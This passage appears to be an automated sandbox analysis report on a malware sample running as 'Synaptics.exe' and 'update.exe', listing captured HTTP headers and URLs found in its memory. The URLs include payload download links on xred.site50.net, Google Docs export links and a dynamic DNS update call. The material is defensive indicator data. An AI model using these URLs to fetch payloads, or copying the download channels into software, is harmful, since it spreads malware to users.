ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5yLLd63mTyymk8cynW1LXLsb9yDn2Dc5Nfeln7d87xFpjosoPUVcws31na8XjG1abvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:50 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EvRgHQ2sVqNNQgM9jmFWhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC41UYyn26Lm1ZDVFJp-pOcvAy7sTxN0DW3XWyJQWVFCXduairEXYKECj7j5Rcl2atpCbozCrr0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:50 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-gYiaHXXfDRklIN--AgVPYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6kNIlWYuOmH-ZCoFzgG9Nfq3M8yaCOsl9KxyRziScypP-sdgJZA_pO8QWG2r5eebemE09wKuoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:56 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SxSJcccvBBdaMxUzMPw-fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6k15TExYxAAz5b6FPdRy3MLZSvIkscNz90wl_eCY6vjUNifMflN6K4jOEL6w-fY8GcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:56 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jCw2YMIf9q4Mv9tI9t0CrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Rk2pdi18vxEe0YfmVS3C9l96fONp5K9IwkWu-PRmFYhA_8wmelTCadjo72y0EEIjMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:09:01 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-2orpwxhy03kheJwZTXAD2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4qsokhAxUkHlHRW54fOnLCDU9cH1M5IvcQmpLO5t9vIGR21KNIfccPZeEOOBwmJ3Y3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:09:02 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Agg0YvNVdaWnwZtvlcVOnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: ._cache_update.exe, 00000007.00000002.2964576754.0000000000DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/O6
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                                Source: update.exe, 00000006.00000003.1876203635.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3025439050.000000001E142000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/0
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/5
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8.4
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/Denetleniyor...
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000076D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GlEVGxuZVk&export=downloadX
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/a
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/cting...
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/eme
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/enetleniyor...
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/f4
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/GlEVGxuZVk&export=download4
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/h
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/user
                                Source: Synaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/l
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/load?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/m
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/me
                                Source: Synaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/p=
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/r
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/tleniyor...
                                Source: Synaptics.exe, 00000008.00000002.3063302398.000000002B5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3089165847.000000003B3BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3053549341.0000000025E3E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloX
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000008.00000002.3009637208.000000001607E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3137223561.000000004F2FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3005442439.0000000013AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2982429982.00000000092AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3131075644.000000004BD3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3088164109.000000003A9BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3018333201.000000001B43E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3130023989.000000004B33E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3138796459.000000004FF7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3065790692.000000002D33E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3070890636.00000000308FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3063834603.000000002BBFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3009908333.00000000162FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3063515800.000000002B83E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3116057112.0000000043A4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3046254746.0000000021D3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2987039818.000000000D12E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3121988687.0000000046C4E000.00000004.00000010.00020000.00000000.sdmp, 
Synaptics.exe, 00000008.00000002.3082429260.00000000370BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2999431728.00000000100FE000.00000004.00000010.00020000.00000000.sdmp
                                String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9x
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;)
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;3
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;6
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=d
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?(
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?2
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?5
                                Source: Synaptics.exe, 00000008.00000002.3131613631.000000004C23E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?w
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAPPKB
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBuluF
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 